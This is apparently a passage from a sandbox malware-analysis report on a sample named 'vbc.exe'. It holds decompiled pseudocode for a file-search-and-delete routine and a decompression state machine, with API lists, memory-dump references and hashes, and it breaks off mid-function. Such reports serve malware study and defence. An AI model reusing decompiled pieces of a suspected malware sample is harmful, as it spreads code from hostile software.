                                                								goto L24;
                                                							}
                                                							goto L16;
                                                							L24:
                                                							_t55 = FindNextFileW(_t70,  &_v604);
                                                							__eflags = _t55;
                                                						} while (_t55 != 0);
                                                						_t38 = FindClose(_t70);
                                                						goto L26;
                                                					}
                                                					__eflags =  *0x425730 - 0x5c;
                                                					if( *0x425730 != 0x5c) {
                                                						goto L11;
                                                					}
                                                					goto L10;
                                                				} else {
                                                					__eflags = _t38;
                                                					if(_t38 == 0) {
                                                						L28:
                                                						__eflags = _a4;
                                                						if(_a4 == 0) {
                                                							L36:
                                                							return _t38;
                                                						}
                                                						__eflags = _v12;
                                                						if(_v12 != 0) {
                                                							_t38 = E00406555(_t68);
                                                							__eflags = _t38;
                                                							if(_t38 == 0) {
                                                								goto L36;
                                                							}
                                                							E00405BC6(_t68);
                                                							_t38 = E004059BB(__eflags, _t68, _v8 | 0x00000001);
                                                							__eflags = _t38;
                                                							if(_t38 != 0) {
                                                								return E00405371(0xffffffe5, _t68);
                                                							}
                                                							__eflags = _v8;
                                                							if(_v8 == 0) {
                                                								goto L30;
                                                							}
                                                							E00405371(0xfffffff1, _t68);
                                                							return E004060B3(_t67, _t68, 0);
                                                						}
                                                						L30:
                                                						 *0x42a2c8 =  *0x42a2c8 + 1;
                                                						return _t38;
                                                					}
                                                					__eflags = _t65 & 0x00000002;
                                                					if((_t65 & 0x00000002) == 0) {
                                                						goto L28;
                                                					}
                                                					goto L5;
                                                				}
                                                			}


















                                                0x00405a0d
                                                0x00405a12
                                                0x00405a1b
                                                0x00405a1e
                                                0x00405a26
                                                0x00405a29
                                                0x00405a2c
                                                0x00405a34
                                                0x00405a36
                                                0x00405a37
                                                0x00000000
                                                0x00405a37
                                                0x00405a42
                                                0x00405a45
                                                0x00405a45
                                                0x00405a45
                                                0x00405a49
                                                0x00405a5c
                                                0x00405a63
                                                0x00405a68
                                                0x00405a6c
                                                0x00405a7c
                                                0x00405a6e
                                                0x00405a74
                                                0x00405a74
                                                0x00405a81
                                                0x00405a85
                                                0x00405a91
                                                0x00405a97
                                                0x00405a9c
                                                0x00405aa2
                                                0x00405aad
                                                0x00405ab3
                                                0x00405ab5
                                                0x00405ab8
                                                0x00405b62
                                                0x00405b62
                                                0x00405b66
                                                0x00405b68
                                                0x00405b68
                                                0x00405b68
                                                0x00405b68
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405abe
                                                0x00405abe
                                                0x00405abe
                                                0x00405ac6
                                                0x00405ae6
                                                0x00405aee
                                                0x00405af3
                                                0x00405afa
                                                0x00405b15
                                                0x00405b1a
                                                0x00405b1c
                                                0x00405b40
                                                0x00405b1e
                                                0x00405b1e
                                                0x00405b21
                                                0x00405b35
                                                0x00405b23
                                                0x00405b26
                                                0x00405b2e
                                                0x00405b2e
                                                0x00405b21
                                                0x00405afc
                                                0x00405b02
                                                0x00405b04
                                                0x00405b0a
                                                0x00405b0a
                                                0x00405b04
                                                0x00000000
                                                0x00405afa
                                                0x00405ac8
                                                0x00405ad0
                                                0x00000000
                                                0x00000000
                                                0x00405ad2
                                                0x00405ada
                                                0x00000000
                                                0x00000000
                                                0x00405adc
                                                0x00405ae4
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405b45
                                                0x00405b4d
                                                0x00405b53
                                                0x00405b53
                                                0x00405b5c
                                                0x00000000
                                                0x00405b5c
                                                0x00405a87
                                                0x00405a8f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405a4b
                                                0x00405a4b
                                                0x00405a4d
                                                0x00405b6d
                                                0x00405b6f
                                                0x00405b72
                                                0x00405bc3
                                                0x00405bc3
                                                0x00405bc3
                                                0x00405b74
                                                0x00405b77
                                                0x00405b82
                                                0x00405b87
                                                0x00405b89
                                                0x00000000
                                                0x00000000
                                                0x00405b8c
                                                0x00405b98
                                                0x00405b9d
                                                0x00405b9f
                                                0x00000000
                                                0x00405bba
                                                0x00405ba1
                                                0x00405ba4
                                                0x00000000
                                                0x00000000
                                                0x00405ba9
                                                0x00000000
                                                0x00405bb0
                                                0x00405b79
                                                0x00405b79
                                                0x00000000
                                                0x00405b79
                                                0x00405a53
                                                0x00405a56
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405a56

                                                APIs
                                                • DeleteFileW.KERNELBASE(?,?,7556D4C4,755513E0,00000000), ref: 00405A2C
                                                • lstrcatW.KERNEL32 ref: 00405A74
                                                • lstrcatW.KERNEL32 ref: 00405A97
                                                • lstrlenW.KERNEL32(?,?,0040A014,?,00425730,?,?,7556D4C4,755513E0,00000000), ref: 00405A9D
                                                • FindFirstFileW.KERNELBASE(00425730,?,?,?,0040A014,?,00425730,?,?,7556D4C4,755513E0,00000000), ref: 00405AAD
                                                • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405B4D
                                                • FindClose.KERNEL32(00000000), ref: 00405B5C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                • String ID: "C:\Users\Public\vbc.exe" $0WB$\*.*
                                                • API String ID: 2035342205-1002228002
                                                • Opcode ID: e466c3725a09c32567c929e5552e175012dfd7f3cab6023745cd85777645cc58
                                                • Instruction ID: 3abc1f52a39f62d65ddaa07d2a5323def7e4f5b1e1581b0ba6d8596f0725500f
                                                • Opcode Fuzzy Hash: e466c3725a09c32567c929e5552e175012dfd7f3cab6023745cd85777645cc58
                                                • Instruction Fuzzy Hash: FA41CE30901A18AADB31AB668C89ABF7678EF41714F10427BF801711D1D7BC69829E6E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 98%
                                                			E004068DA() {
                                                				unsigned short _t531;
                                                				signed int _t532;
                                                				void _t533;
                                                				void* _t534;
                                                				signed int _t535;
                                                				signed int _t565;
                                                				signed int _t568;
                                                				signed int _t590;
                                                				signed int* _t607;
                                                				void* _t614;
                                                
                                                				L0:
                                                				while(1) {
                                                					L0:
                                                					if( *(_t614 - 0x40) != 0) {
                                                						 *(_t614 - 0x34) = 1;
                                                						 *(_t614 - 0x84) = 7;
                                                						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
                                                						L132:
                                                						 *(_t614 - 0x54) = _t607;
                                                						L133:
                                                						_t531 =  *_t607;
                                                						_t590 = _t531 & 0x0000ffff;
                                                						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
                                                						if( *(_t614 - 0xc) >= _t565) {
                                                							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
                                                							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
                                                							 *(_t614 - 0x40) = 1;
                                                							_t532 = _t531 - (_t531 >> 5);
                                                							 *_t607 = _t532;
                                                						} else {
                                                							 *(_t614 - 0x10) = _t565;
                                                							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                                                							 *_t607 = (0x800 - _t590 >> 5) + _t531;
                                                						}
                                                						if( *(_t614 - 0x10) >= 0x1000000) {
                                                							L139:
                                                							_t533 =  *(_t614 - 0x84);
                                                							L140:
                                                							 *(_t614 - 0x88) = _t533;
                                                							goto L1;
                                                						} else {
                                                							L137:
                                                							if( *(_t614 - 0x6c) == 0) {
                                                								 *(_t614 - 0x88) = 5;
                                                								goto L170;
                                                							}
                                                							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
                                                							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                                                							goto L139;
                                                						}
                                                					} else {
                                                						__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                						__esi =  *(__ebp - 0x60);
                                                						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                						__ecx =  *(__ebp - 0x3c);
                                                						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                						__ecx =  *(__ebp - 4);
                                                						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                						if( *(__ebp - 0x38) >= 4) {
                                                							if( *(__ebp - 0x38) >= 0xa) {
                                                								_t97 = __ebp - 0x38;
                                                								 *_t97 =  *(__ebp - 0x38) - 6;
                                                							} else {
                                                								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                							}
                                                						} else {
                                                							 *(__ebp - 0x38) = 0;
                                                						}
                                                						if( *(__ebp - 0x34) == __edx) {
                                                							__ebx = 0;
                                                							__ebx = 1;
                                                							L60:
                                                							__eax =  *(__ebp - 0x58);
                                                							__edx = __ebx + __ebx;
                                                							__ecx =  *(__ebp - 0x10);
                                                							__esi = __edx + __eax;
                                                							__ecx =  *(__ebp - 0x10) >> 0xb;
                                                							__ax =  *__esi;
                                                							 *(__ebp - 0x54) = __esi;
                                                							__edi = __ax & 0x0000ffff;
                                                							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                							if( *(__ebp - 0xc) >= __ecx) {
                                                								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                								__cx = __ax;
                                                								_t216 = __edx + 1; // 0x1
                                                								__ebx = _t216;
                                                								__cx = __ax >> 5;
                                                								 *__esi = __ax;
                                                							} else {
                                                								 *(__ebp - 0x10) = __ecx;
                                                								0x800 = 0x800 - __edi;
                                                								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                								__ebx = __ebx + __ebx;
                                                								 *__esi = __cx;
                                                							}
                                                							 *(__ebp - 0x44) = __ebx;
                                                							if( *(__ebp - 0x10) >= 0x1000000) {
                                                								L59:
                                                								if(__ebx >= 0x100) {
                                                									goto L54;
                                                								}
                                                								goto L60;
                                                							} else {
                                                								L57:
                                                								if( *(__ebp - 0x6c) == 0) {
                                                									 *(__ebp - 0x88) = 0xf;
                                                									goto L170;
                                                								}
                                                								__ecx =  *(__ebp - 0x70);
                                                								__eax =  *(__ebp - 0xc);
                                                								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                								_t202 = __ebp - 0x70;
                                                								 *_t202 =  *(__ebp - 0x70) + 1;
                                                								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                								goto L59;
                                                							}
                                                						} else {
                                                							__eax =  *(__ebp - 0x14);
                                                							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                							if(__eax >=  *(__ebp - 0x74)) {
                                                								__eax = __eax +  *(__ebp - 0x74);
                                                							}
                                                							__ecx =  *(__ebp - 8);
                                                							__ebx = 0;
                                                							__ebx = 1;
                                                							__al =  *((intOrPtr*)(__eax + __ecx));
                                                							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                							L40:
                                                							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                							__ecx =  *(__ebp - 0x58);
                                                							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                							 *(__ebp - 0x48) = __eax;
                                                							__eax = __eax + 1;
                                                							__eax = __eax << 8;
                                                							__eax = __eax + __ebx;
                                                							__esi =  *(__ebp - 0x58) + __eax * 2;
                                                							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                							__ax =  *__esi;
                                                							 *(__ebp - 0x54) = __esi;
                                                							__edx = __ax & 0x0000ffff;
                                                							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                							if( *(__ebp - 0xc) >= __ecx) {
                                                								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                								__cx = __ax;
                                                								 *(__ebp - 0x40) = 1;
                                                								__cx = __ax >> 5;
                                                								__ebx = __ebx + __ebx + 1;
                                                								 *__esi = __ax;
                                                							} else {
                                                								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                								 *(__ebp - 0x10) = __ecx;
                                                								0x800 = 0x800 - __edx;
                                                								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                								__ebx = __ebx + __ebx;
                                                								 *__esi = __cx;
                                                							}
                                                							 *(__ebp - 0x44) = __ebx;
                                                							if( *(__ebp - 0x10) >= 0x1000000) {
                                                								L38:
                                                								__eax =  *(__ebp - 0x40);
                                                								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                									while(1) {
                                                										if(__ebx >= 0x100) {
                                                											break;
                                                										}
                                                										__eax =  *(__ebp - 0x58);
                                                										__edx = __ebx + __ebx;
                                                										__ecx =  *(__ebp - 0x10);
                                                										__esi = __edx + __eax;
                                                										__ecx =  *(__ebp - 0x10) >> 0xb;
                                                										__ax =  *__esi;
                                                										 *(__ebp - 0x54) = __esi;
                                                										__edi = __ax & 0x0000ffff;
                                                										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                										if( *(__ebp - 0xc) >= __ecx) {
                                                											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                											__cx = __ax;
                                                											_t169 = __edx + 1; // 0x1
                                                											__ebx = _t169;
                                                											__cx = __ax >> 5;
                                                											 *__esi = __ax;
                                                										} else {
                                                											 *(__ebp - 0x10) = __ecx;
                                                											0x800 = 0x800 - __edi;
                                                											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                											__ebx = __ebx + __ebx;
                                                											 *__esi = __cx;
                                                										}
                                                										 *(__ebp - 0x44) = __ebx;
                                                										if( *(__ebp - 0x10) < 0x1000000) {
                                                											L45:
                                                											if( *(__ebp - 0x6c) == 0) {
                                                												 *(__ebp - 0x88) = 0xe;
                                                												goto L170;
                                                											}
                                                											__ecx =  *(__ebp - 0x70);
                                                											__eax =  *(__ebp - 0xc);
                                                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											_t155 = __ebp - 0x70;
                                                											 *_t155 =  *(__ebp - 0x70) + 1;
                                                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                										}
                                                									}
                                                									L53:
                                                									_t172 = __ebp - 0x34;
                                                									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
                                                									L54:
                                                									__al =  *(__ebp - 0x44);
                                                									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                									L55:
                                                									if( *(__ebp - 0x64) == 0) {
                                                										 *(__ebp - 0x88) = 0x1a;
                                                										goto L170;
                                                									}
                                                									__ecx =  *(__ebp - 0x68);
                                                									__al =  *(__ebp - 0x5c);
                                                									__edx =  *(__ebp - 8);
                                                									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                									 *( *(__ebp - 0x68)) = __al;
                                                									__ecx =  *(__ebp - 0x14);
                                                									 *(__ecx +  *(__ebp - 8)) = __al;
                                                									__eax = __ecx + 1;
                                                									__edx = 0;
                                                									_t191 = __eax %  *(__ebp - 0x74);
                                                									__eax = __eax /  *(__ebp - 0x74);
                                                									__edx = _t191;
                                                									L79:
                                                									 *(__ebp - 0x14) = __edx;
                                                									L80:
                                                									 *(__ebp - 0x88) = 2;
                                                									goto L1;
                                                								}
                                                								if(__ebx >= 0x100) {
                                                									goto L53;
                                                								}
                                                								goto L40;
                                                							} else {
                                                								L36:
                                                								if( *(__ebp - 0x6c) == 0) {
                                                									 *(__ebp - 0x88) = 0xd;
                                                									L170:
                                                									_t568 = 0x22;
                                                									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
                                                									_t535 = 0;
                                                									L172:
                                                									return _t535;
                                                								}
                                                								__ecx =  *(__ebp - 0x70);
                                                								__eax =  *(__ebp - 0xc);
                                                								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                								_t121 = __ebp - 0x70;
                                                								 *_t121 =  *(__ebp - 0x70) + 1;
                                                								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                								goto L38;
                                                							}
                                                						}
                                                					}
                                                					L1:
                                                					_t534 =  *(_t614 - 0x88);
                                                					if(_t534 > 0x1c) {
                                                						L171:
                                                						_t535 = _t534 | 0xffffffff;
                                                						goto L172;
                                                					}
                                                					switch( *((intOrPtr*)(_t534 * 4 +  &M0040717D))) {
                                                						case 0:
                                                							if( *(_t614 - 0x6c) == 0) {
                                                								goto L170;
                                                							}
                                                							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                							_t534 =  *( *(_t614 - 0x70));
                                                							if(_t534 > 0xe1) {
                                                								goto L171;
                                                							}
                                                							_t538 = _t534 & 0x000000ff;
                                                							_push(0x2d);
                                                							asm("cdq");
                                                							_pop(_t570);
                                                							_push(9);
                                                							_pop(_t571);
                                                							_t610 = _t538 / _t570;
                                                							_t540 = _t538 % _t570 & 0x000000ff;
                                                							asm("cdq");
                                                							_t605 = _t540 % _t571 & 0x000000ff;
                                                							 *(_t614 - 0x3c) = _t605;
                                                							 *(_t614 - 0x1c) = (1 << _t610) - 1;
                                                							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                							_t613 = (0x300 << _t605 + _t610) + 0x736;
                                                							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
                                                								L10:
                                                								if(_t613 == 0) {
                                                									L12:
                                                									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
                                                									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                                                									goto L15;
                                                								} else {
                                                									goto L11;
                                                								}
                                                								do {
                                                									L11:
                                                									_t613 = _t613 - 1;
                                                									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
                                                								} while (_t613 != 0);
                                                								goto L12;
                                                							}
                                                							if( *(_t614 - 4) != 0) {
                                                								GlobalFree( *(_t614 - 4));
                                                							}
                                                							_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                							 *(_t614 - 4) = _t534;
                                                							if(_t534 == 0) {
                                                								goto L171;
                                                							} else {
                                                								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
                                                								goto L10;
                                                							}
                                                						case 1:
                                                							L13:
                                                							__eflags =  *(_t614 - 0x6c);
                                                							if( *(_t614 - 0x6c) == 0) {
                                                								 *(_t614 - 0x88) = 1;
                                                								goto L170;
                                                							}
                                                							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
                                                							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                							_t45 = _t614 - 0x48;
                                                							 *_t45 =  *(_t614 - 0x48) + 1;
                                                							__eflags =  *_t45;
                                                							L15:
                                                							if( *(_t614 - 0x48) < 4) {
                                                								goto L13;
                                                							}
                                                							_t546 =  *(_t614 - 0x40);
                                                							if(_t546 ==  *(_t614 - 0x74)) {
                                                								L20:
                                                								 *(_t614 - 0x48) = 5;
                                                								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
                                                								goto L23;
                                                							}
                                                							 *(_t614 - 0x74) = _t546;
                                                							if( *(_t614 - 8) != 0) {
                                                								GlobalFree( *(_t614 - 8));
                                                							}
                                                							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
                                                							 *(_t614 - 8) = _t534;
                                                							if(_t534 == 0) {
                                                								goto L171;
                                                							} else {
                                                								goto L20;
                                                							}
                                                						case 2:
                                                							L24:
                                                							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
                                                							 *(_t614 - 0x84) = 6;
                                                							 *(_t614 - 0x4c) = _t553;
                                                							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
                                                							goto L132;
                                                						case 3:
                                                							L21:
                                                							__eflags =  *(_t614 - 0x6c);
                                                							if( *(_t614 - 0x6c) == 0) {
                                                								 *(_t614 - 0x88) = 3;
                                                								goto L170;
                                                							}
                                                							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                							_t67 = _t614 - 0x70;
                                                							 *_t67 =  &(( *(_t614 - 0x70))[1]);
                                                							__eflags =  *_t67;
                                                							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                                                							L23:
                                                							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
                                                							if( *(_t614 - 0x48) != 0) {
                                                								goto L21;
                                                							}
                                                							goto L24;
                                                						case 4:
                                                							goto L133;
                                                						case 5:
                                                							goto L137;
                                                						case 6:
                                                							goto L0;
                                                						case 7:
                                                							__eflags =  *(__ebp - 0x40) - 1;
                                                							if( *(__ebp - 0x40) != 1) {
                                                								__eax =  *(__ebp - 0x24);
                                                								 *(__ebp - 0x80) = 0x16;
                                                								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                								__eax =  *(__ebp - 0x28);
                                                								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                								__eax =  *(__ebp - 0x2c);
                                                								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                								__eax = 0;
                                                								__eflags =  *(__ebp - 0x38) - 7;
                                                								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                								__al = __al & 0x000000fd;
                                                								__eax = (__eflags >= 0) - 1 + 0xa;
                                                								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                								__eax =  *(__ebp - 4);
                                                								__eax =  *(__ebp - 4) + 0x664;
                                                								__eflags = __eax;
                                                								 *(__ebp - 0x58) = __eax;
                                                								goto L68;
                                                							}
                                                							__eax =  *(__ebp - 4);
                                                							__ecx =  *(__ebp - 0x38);
                                                							 *(__ebp - 0x84) = 8;
                                                							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                							goto L132;
                                                						case 8:
                                                							__eflags =  *(__ebp - 0x40);
                                                							if( *(__ebp - 0x40) != 0) {
                                                								__eax =  *(__ebp - 4);
                                                								__ecx =  *(__ebp - 0x38);
                                                								 *(__ebp - 0x84) = 0xa;
                                                								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                							} else {
                                                								__eax =  *(__ebp - 0x38);
                                                								__ecx =  *(__ebp - 4);
                                                								__eax =  *(__ebp - 0x38) + 0xf;
                                                								 *(__ebp - 0x84) = 9;
                                                								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                							}
                                                							goto L132;
                                                						case 9:
                                                							__eflags =  *(__ebp - 0x40);
                                                							if( *(__ebp - 0x40) != 0) {
                                                								goto L89;
                                                							}
                                                							__eflags =  *(__ebp - 0x60);
                                                							if( *(__ebp - 0x60) == 0) {
                                                								goto L171;
                                                							}
                                                							__eax = 0;
                                                							__eflags =  *(__ebp - 0x38) - 7;
                                                							_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                							__eflags = _t258;
                                                							0 | _t258 = _t258 + _t258 + 9;
                                                							 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                							goto L75;
                                                						case 0xa:
                                                							__eflags =  *(__ebp - 0x40);
                                                							if( *(__ebp - 0x40) != 0) {
                                                								__eax =  *(__ebp - 4);
                                                								__ecx =  *(__ebp - 0x38);
                                                								 *(__ebp - 0x84) = 0xb;
                                                								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                								goto L132;
                                                							}
                                                							__eax =  *(__ebp - 0x28);
                                                							goto L88;
                                                						case 0xb:
                                                							__eflags =  *(__ebp - 0x40);
                                                							if( *(__ebp - 0x40) != 0) {
                                                								__ecx =  *(__ebp - 0x24);
                                                								__eax =  *(__ebp - 0x20);
                                                								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                							} else {
                                                								__eax =  *(__ebp - 0x24);
                                                							}
                                                							__ecx =  *(__ebp - 0x28);
                                                							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                							L88:
                                                							__ecx =  *(__ebp - 0x2c);
                                                							 *(__ebp - 0x2c) = __eax;
                                                							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                							L89:
                                                							__eax =  *(__ebp - 4);
                                                							 *(__ebp - 0x80) = 0x15;
                                                							__eax =  *(__ebp - 4) + 0xa68;
                                                							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                							goto L68;
                                                						case 0xc:
                                                							L99:
                                                							__eflags =  *(__ebp - 0x6c);
                                                							if( *(__ebp - 0x6c) == 0) {
                                                								 *(__ebp - 0x88) = 0xc;
                                                								goto L170;
                                                							}
                                                							__ecx =  *(__ebp - 0x70);
                                                							__eax =  *(__ebp - 0xc);
                                                							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                							_t334 = __ebp - 0x70;
                                                							 *_t334 =  *(__ebp - 0x70) + 1;
                                                							__eflags =  *_t334;
                                                							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                							__eax =  *(__ebp - 0x2c);
                                                							goto L101;
                                                						case 0xd:
